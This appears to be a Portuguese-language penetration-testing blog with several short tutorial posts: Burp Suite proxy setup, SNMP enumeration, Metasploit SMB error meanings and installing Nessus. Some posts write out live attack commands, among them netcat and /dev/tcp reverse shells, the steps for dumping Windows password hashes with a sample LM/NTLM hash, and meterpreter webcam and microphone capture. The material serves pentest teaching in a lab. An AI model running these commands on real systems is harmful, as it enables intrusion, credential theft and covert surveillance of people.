– root@injetionsec:~#

#01 – Burp Suite

14.07.2015 (1:25 pm) – Filed under: Pentest ::

A principal utilidade do burp suite e interceptar o tráfego web regular nos protocolos HTTP e HTTPS, tudo isso para interceptar dados entre o servidor web e a solicitação do usuário, se podemos ver as solicitações de respostas das aplicações web podemos adotar técnicas para testar a segurança, configure seu navegador usando proxy:

Adress: localhost Port : 8080
Ou
Adress: 127.0.0.1 Port : 8080

Você pode verificar se esta configurado acessando no seu navegador http://burp se estiver tudo configurado vera a seguinte tela abaixo:

burpsuite_1

Podemos adicionar vários hosts, porta e o protocolo, se tivermos uma lista de host para adicionar fazemos da seguinte forma.

burpsuite_2burpsuite_3

 

Às vezes, a aplicação que precisamos testar encontra-se dentro de alguma rede corporativa e o clientes que tem acesso tem um endereço IP específico para poder passar no firewall corporativo, outras vezes nós estamos dentro do local do cliente mas precisamos ter um proxy interno para obter acesso ao site e iniciar o teste. Em todos esses casos temos de ser capazes de adicionar um proxy adicional para analisarmos no  Burp como usamos nos navegadores.

Usando tunelamento SSH como um SOCKS proxy é bastante útil quando queremos dar um IP valido para um administrador de firewall para acessar um aplicativo, para isso você terá que ter um servidor com um endereço IP estático, que você pode conectar usando  o SSH. Mas se gostaria-mos de interceptar o tráfego de nossa televisão,  iOS ou dispositivos Android, podemos fazer configurando diferentes portas e interfaces, vamos em Proxy> Proxy Listeners , depois é add os proxy e a porta qualquer.

burpsuite_9

SSL e opções avançadas

 O HTTPS é uma combinação de HTTP sobre SSL/TLS para evitar a espionagem, adulteração, e ataques MITM. Para interceptar o tráfego através de HTTPS, é preciso configurar mais algumas coisas em navegadores e servidores certificados X.509, que são assinados pela autoridade certificadora, o burp gera um certificado valido que e aceito pelo  navegador, se o certificado não for assinado pela autoridade certificadora conhecida por nós, nos deparamos com erros inválidos de certificado.

burpsuite_5

Neste ponto, podemos aceitar o erro e iniciar a intercepção pois e esse o erro que esperávamos  para iniciarmos nossos testes, iremos gerar um CA no burp suíte, devidamente configurado como proxy, iremos clicar em CA, após isso sera gerado um certificado para importamos para o navegador.

burpsuite_6burpsuite_7

Clique em OK e vamos ao navegador e digitamos http://burp  veja se ocorreu algum erro, caso contrario seu certificado estará instalado com sucesso!

Passagem SSL

 Às vezes, devido à forma como os aplicativos e sites são criados, pode não ser possível interceptar o tráfego SSL. Normalmente o burp irá mostrar um erro de negociação SSL, um dos casos mais comuns é quando um aplicação móvel ou outro dispositivo utiliza certificate pinning[1][2], podemos adicionar o host na lista de passagem SSL. Isso pode ser automatizado, marcando uma opção, veja abaixo:

burpsuite_8

Referências
[1] https://media.blackhat.com/bh-us-12/Turbo/Diquet/BH_US_12_Diqut_Osborne_Mobile_Certificate_Pinning_Slides.pdf
[2] http://resources.infosecinstitute.com/ios-application-security-part-36-bypassing-certificate-pinning-using-ssl-kill-switch/
https://support.portswigger.net/customer/portal/articles/1841101-configuring-an-android-device-to-work-with-burp
https://www.nccgroup.trust/us/about-us/newsroom-and-events/blog/2012/july/network-analysis-with-proxydroid-burpsuite-and-hipster-dog/

Pass/User de roteadores e modens

07.07.2015 (7:21 pm) – Filed under: Dicas,Pentest ::

Esse site  tem uma lista completa de senhas e nomes de usuário de roteadores,modens como: TP-Link,Cisco,Thomson,Linksys e etc.

0/

Privilégios de admin em Windows (NT/2000/XP/2003/7/2008/8)

05.07.2015 (2:18 pm) – Filed under: Hacking,Pentest,Windows ::

windowsss

Galera iniciarei uma série de post retratando como remover senhas para ter acesso a sistemas windows (NT/2000/XP/2003/7/2008/2012/8), visto que esse ataques você terá que ter acesso físico a máquina.

» Reset à senha de administrator – Windows 7/2008/2012
» Reset à senha de administrator – Windows XP
» Reset à senha de administrator – Windows 2003
» Reset à senha de administrator – Windows NT/2000

0/

Extrair hash do Windows – “PwDump” e “hashdump”

04.07.2015 (2:37 pm) – Filed under: Pentest ::

A fim de quebrar senhas você deve primeiro obter os hashes armazenados dentro do sistema operacional,essas hashes são armazenados no arquivo do Windows SAM. Esse arquivo está localizado em seu sistema em C:\Windows\System32\config, não é acessível enquanto o sistema operacional é inicializado, irei retratar dois modos para pegar essas hash(existem outros).

1º –  usando o QuarksPwDump_v0.2b.zip para extrair as hash de sistemas operacionais Windows(XP/2003/Vista/ 7/2008/8) suas opções são:

d9fijdsfoidf

Com os devidos privilégios no sistema podemos executar os seguintes comandos no meterpreter para fazer o upload do pwdump na maquina alvo:

meterpreter > upload /root/Downloads/PwDump.exe c:\\windows\\system32\\

d9fijdsfoidf_2

meterpreter > shell
C:\WINDOWS\system32> PwDump.exe –dump-hash-local

d9fijdsfoidf_3

Como pode ser visto acima extraímos as hashes, composto pelo seguinte formato :

Username:RID:LMHash:NTLMHash:::

LM      ccf9155e3e7db453aad3b435b51404ee
NTLM      3dbde697d71690a769204beb12283678

Podemos usar bruteforce para conseguir a senha, algumas pessoas deixam senhas mais fáceis, basta pesquisar no google que temos alguns resultados no caso dessas hashs são fáceis: LM e NTLM , no caso nossa senha de administrador é : 123

2º – a outra forma é usar um simples comando do meterpreter “hashdump” veja abaixo:

d9fijdsfoidf_4

Post simples aparentemente, mas resolvi compartilhar. 0/

Capturando webcam e microfone com meterpreter

04.04.2015 (1:44 pm) – Filed under: Pentest ::

Galera 2 comandos muito interessante do meterpreter são : webcam_list, webcam_snap, record_mic , em primeiro lugar, é necessário ter uma sessão ativa do meterpreter no host windows.

meterpreter >  webcam_list
Este comando permite que você tenha uma lista de webcams presente no sistema de destino é cada câmera será identificada por um número único.

meterpreter > webcam_snap
Este comando captura uma web cam especificando o numero padrão listado no comando “webcam_list”  por default webcam 1 será usado se nenhum argumento for especificado.

O comando webcam_snap pode ter os seguintes argumentos:
-h:  ajuda.
-i :  identificador exclusivo da webcam para você usar.
-p : O caminho para a captura de imagem .jpeg ,  o padrão é $HOME / [numeroaleatorio] .jpeg
-q : captura JPEG, por default ’50’.
-v : Abrir automaticamente a captura jpeg, por default ‘true’.

meterpreter >  record_mic
Este comando salva o ambiente de som integrado microfone,por padrão apenas um segundo será gravado assim que a gravação acabar ele para automaticamente

O comando record_mic pode ter os seguintes argumentos:
-h: ajuda.
-d : O número em segundos para gravação, o default é 1 segundo.
-f : O caminho de gravação para o arquivo .wav ,  o padrão é $HOME / [numeroaleatorio] .wav
-p :  o arquivo e capturado automaticamente, por default ‘true’.

➦ Se quisermos ver ao vivo o que esta passando na máquina alvo, para isso temos que iniciar o script webcam da shell sem o metasploit e então setar-lo diretamente na sessão:

sessions -i 1 -s webcam -f -p /root/arquivos/

➦ É  possível executar o script diretamente no shell do metasploit o “sound_recorder sem setar diretamente a sessão.

sessions -i 1 -s sound_recorder /arquivos/

Erros inesperados na execução dos módulos – metasploit

01.04.2015 (7:23 pm) – Filed under: Pentest ::

Algumas vezes estamos realizando alguma analise ou ate mesmo simulando algum pentest em nossos lab controlados, percebemos alguns erros no metasploit ao levantar privilégios na maquina alvo, e algumas saídas desses possíveis erros iremos mencionar segue :

[-] Exploit failed: Rex::AddressInUse The address is already in use (0.0.0.0:4444).
Motivo do erro: O endereço não pode ser usado por que ele já esta sendo usado

[-] Exploit failed [unreachable]: Rex::ConnectionTimeout The connection timed out (192.168.28.86:445).
Motivo do erro: firewall no computador de destino bloqueando o ataque.

[-] Exploit failed [unreachable]: Rex::HostUnreachable The host (192.168.28.86:445) was unreachable.
Motivo do erro: A máquina de destino não está acessível, esse erro e ocasionado quando o host esta fora da rede ou ate mesmo sendo bloqueado pela rede por um firewall

[-] Exploit failed [unreachable]: Rex::ConnectionRefused The connection was refused by the remote host (192.168.28.86:445).
Motivo do erro: arquivo e compartilhamento de impressora está desligado.

[-] Exploit failed [no-access]: Rex::Proto::SMB::Exceptions::LoginError Login Failed: execution expired
Motivo do erro: Ocorreu um erro durante a autenticação,pode ser que a conta  do computador de destino não tem acesso à máquina ocorrendo esse erro.

[-] Exploit failed [no-access]: Rex::Proto::SMB::Exceptions::LoginError Login Failed: The server responded with error: STATUS_LOGON_FAILURE (Command=115 WordCount=0)
Motivo do erro: nome de usuário ou senha estão incorreta.

[-] Exploit failed [no-access]: Rex::Proto::SMB::Exceptions::LoginError Login Failed: The server responded with error: STATUS_NETLOGON_NOT_STARTED (Command=115 WordCount=0)
Motivo do erro: serviço netlogon (ou grupo de trabalho/browser) está desativado.

[-] Exploit failed [no-access]: Rex::Proto::SMB::Exceptions::LoginError Login Failed: The server responded with error: STATUS_ACCOUNT_DISABLED (Command=115 WordCount=0)
Motivo do erro:  A conta esta desativada.

[-] Exploit failed [no-access]: Rex::Proto::SMB::Exceptions::LoginError Login Failed: The server responded with error: STATUS_PASSWORD_MUST_CHANGE (Command=115 WordCount=0)
Motivo do erro: para alterar a senha da conta é necessário tem que esperar um determinado tempo,devido a politicas de senhas.

[-] Exploit failed [no-access]: Rex::Proto::SMB::Exceptions::LoginError Login Failed: Connection reset by peer
Motivo do erro: O pedido de conexão do serviço enviado (RST) esta fechado.

[-] Exploit failed [no-access]: Rex::Proto::SMB::Exceptions::LoginError Login Failed: The server responded with error: STATUS_ACCOUNT_RESTRICTION (Command=115 WordCount=0)
Motivo do erro: as credenciais da conta estão bloqueadas (nome de usuário/senha) as senhas das contas dos computadores na rede não podem ser vazias para liberar o acesso, essas contas são somente em branco em login feito em console.

[-] Exploit failed [no-access]: Rex::Proto::SMB::Exceptions::LoginError Login Failed: The server responded with error: STATUS_ACCOUNT_LOCKED_OUT (Command=115 WordCount=0)
Motivo do erro: Conta bloqueada

[-] Exploit failed [no-access]: Rex::Proto::SMB::Exceptions::LoginError Login Failed: The server responded with error: STATUS_LOGON_TYPE_NOT_GRANTED (Command=115 WordCount=0)
Motivo do erro:   As credenciais da conta (usuário/senha) são necessarias, o acesso ao computador através da rede não pode ser alcançado por essa conta, nesse caso em politica de grupo devem negar acesso a esse computador pela rede.

[-] Exploit failed: Rex::Proto::SMB::Exceptions::ErrorCode The server responded with error: STATUS_BAD_NETWORK_NAME (Command=117 WordCount=0)
Motivo do erro:   compartilhamento administrativo (ADMIN$) estão fechados. Ou, um diretório de compartilhamento incorreto (C$\Users joão) são indicados.

[-] Exploit failed [no-access]: Rex::Proto::SMB::Exceptions::ErrorCode The server responded with error: STATUS_ACCESS_DENIED (Command=117 WordCount=0)
Motivo do erro:  Autorização é insuficiente. UAC(User Account Control) pode ser uma conta de administrador local ou ser ativo.

[-] Exploit failed: Rex::Proto::SMB::Exceptions::ErrorCode The server responded with error: STATUS_OBJECT_PATH_SYNTAX_BAD (Command=45 WordCount=0)
Motivo do erro: diretório incorreto

[-] Exploit failed: Rex::Proto::SMB::Exceptions::ErrorCode The server responded with error: STATUS_OBJECT_NAME_NOT_FOUND (Command=6 WordCount=0)
Motivo do erro:  O antivírus não está funcionando corretamente de modo á ser prejudicial.

[-] Exploit failed: Rex::Proto::SMB::Exceptions::ErrorCode The server responded with error: STATUS_SHARING_VIOLATION (Command=6 WordCount=0)
Motivo do erro:  um programa ao ser aberto, pode não funcionar corretamente, apesar de recebemos esse erro a sessão do  Meterpret pode ser obtida.

Referencia (tradução/adaptação) : http://ertugrulbasaranoglu.blogspot.com.br/

snmp reconnaissance

31.03.2015 (2:46 pm) – Filed under: Pentest ::

Simple Network Management Protocol (SNMP), é um “protocolo usado para gerenciar dispositivos em redes IP”,esses dispositivos podem ser roteadores, comutadores, servidores, estações de trabalho, impressoras, racks modernos e etc. Ele consiste de um conjunto de padrões de gerenciamento de rede, incluindo um protocolo da camada de aplicação, um esquema de banco de dados, e um conjunto de objetos de dados by wikipedia

snmp  reconnaissance , é baseado em  UDP, suscetivel a ataque IP spoofing , tem sistema fraco para autenticação, podemos usar um simples sniffer para caputrar um pedido SNMP é assim comprometer á rede.

– examinar informações de um servidor rodando windows :

snmpwalk -c public -v1 [ip_vítima] 1

– buscando informações sensíveis

snmpwalk -c public -v1 [ip_vítima] | grep -i SNMPv2-MIB :: sysdescr.0

– listadando usuários

snmpwalk -c public -v1 [ip_vítima] |  cut -d “” -f4

– enumerando serviços que estão executando “run name”

snmpwalk -c public -v1 [ip_vítima] 1 | grep -i hrswrunname | cut -d “” -f4

–  enumerar portas TCP abertas “tcp connstate”

snmpwalk -c public -v1 [ip_vítima]  1 | grep -i tcpconnstate | cut -d”.” -f6 | sort -nu

– enumerando software instalados “installed name”

snmpwalk -c public -v1 [ip_vítima] 1 | grep -i hrswinstalledname

Podemos usar algumas ferramentas automatizadas como : snmpenum.pl, snmpcheck.pl e onesixtyone para agilizar na enumeração.

=)

Site de pesquisa de vulnerabilidade

19.03.2015 (8:32 pm) – Filed under: Pentest ::

Galera segue alguns sites para consultar vulnerabilidades :

http://exploitsearch.net # costumo usar esse pois ele faz uma pesquisa nos sites (tenable,mitre,exploit-db,rapid7, etc…)

https://bugscollector.com/ # é um banco de dados com várias vulnerabilidades descobertas coletadas.

http://exploitsearch.com/

http://www.wooyun.org/   #  é uma plataforma onde os pesquisadores de segurança relatam as vulnerabilidades e corporações dão os  feedbacks

http://osvdb.org/ # fornecer informações precisas e detalhadas sobre segurança da informação

http://www.rapid7.com/db/modules/

http://www.exploit-db.com/

http://www.osvdb.org/

http://cve.mitre.org/

http://cxsecurity.com

http://www.cvedetails.com/

http://www.coresecurity.com/products/core-impact/recent-exploits-and-updates

http://www.securityfocus.com/bid

https://github.com/wimremes/cve-search # cvs-search

http://www.packetstormsecurity.org/

http://ariko-security.com/index-7.html

http://www.security-database.com/view-all.php

http://www.securityhome.eu/

http://secunia.com/advisories/historic/

https://nvd.nist.gov/

http://cxsecurity.com/exploit/

http://www.hack0wn.com/

http://farlight.org/

=)

ferramentas – linux shell

26.12.2014 (4:23 pm) – Filed under: Pentest ::

galera segue alguns comandos que achei interessante abordar, aprendi realizando alguns testes no lab controlado que tenho por aqui, são simples mas de extrema importância.

– reverse shell

root@bt:~# nc -lvp 4444
root@bt:~# nc -vvz 192.168.40.11 4444 -e /bin/bash

OU

root@bt:~# nc -n -vv -l -p 4444
root@bt:~# /bin/bash –i >/dev/tcp/192.168.40.11/4444 0<&1 2>&1

– netcat (GAPING_SECURITY_HOLE) desabilitado

quando o GAPING_SECURITY_HOLE está desativado você não tem acesso à opção ‘-e’ do netcat pode-se fazer da seguinte forma:

root@bt:~# nc -n -vv -l -p 4444
root@bt:~# mknod file p && nc 192.168.40.11 4444 0<file | /bin/bash 1>file

– sem netcat , usando socket para conectar no host

root@bt:~# sudo /sbin/iptables -I INPUT 1 -p tcp –dport 4444 -j ACCEPT # “connetion refused” to firewall rejecting connection
root@bt:~# /bin/bash -i > /dev/tcp/192.168.40.11/4444 0<&1 2>&1 
root@bt:~# nc -n -vv -l -p 4444

– sem netcat e /dev/tcp “usando telnet”

root@bt:~# sudo /sbin/iptables -I INPUT 1 -p tcp –dport 4444 -j ACCEPT # “connetion refused” to firewall rejecting connection
root@bt:~# nc -n -vv -l -p 4444
root@bt:~# mknod file p && nc 192.168.40.11 4444 0<file | /bin/bash 1>file

até + galera 0/

 

Referência : ebook Hacking by Pankaj | netcat_infrastructure.pdf

Instalando o nessus

07.10.2014 (2:37 pm) – Filed under: Pentest ::

Nessus é um scanner de vulnerabilidades poderoso. Infelizmente, desde a versão 3, o Nessus não é mais um software Open Source,vamos ter que baixa-lo diretamente do site oficial é logo depois registra.

1o – instalando o pacote .deb
dpkg-i Nessus-4.4.1-ubuntu910_i386.deb
Se quiser, você pode depois dessa instalação passar para a etapa 3o e 5o; logo em seguida você vera as instruções de instalação,download e código.

2o – No terminal digite para add o usuário
/opt/nessus/sbin/nessus-adduser

3o – startamos o nessus
/etc/init.d/nessusd start

dsdifjds

4o – registrar o codigo fornecido no email
/opt/nessus/bin/nessus-fetch –register [seu código]
** dois traços antes do register

wiue

5o- depois e só entrar em seu navegado,esperar o processo de install e assim logar
https://localhost:8834/

Ate o próximo tópico galera =]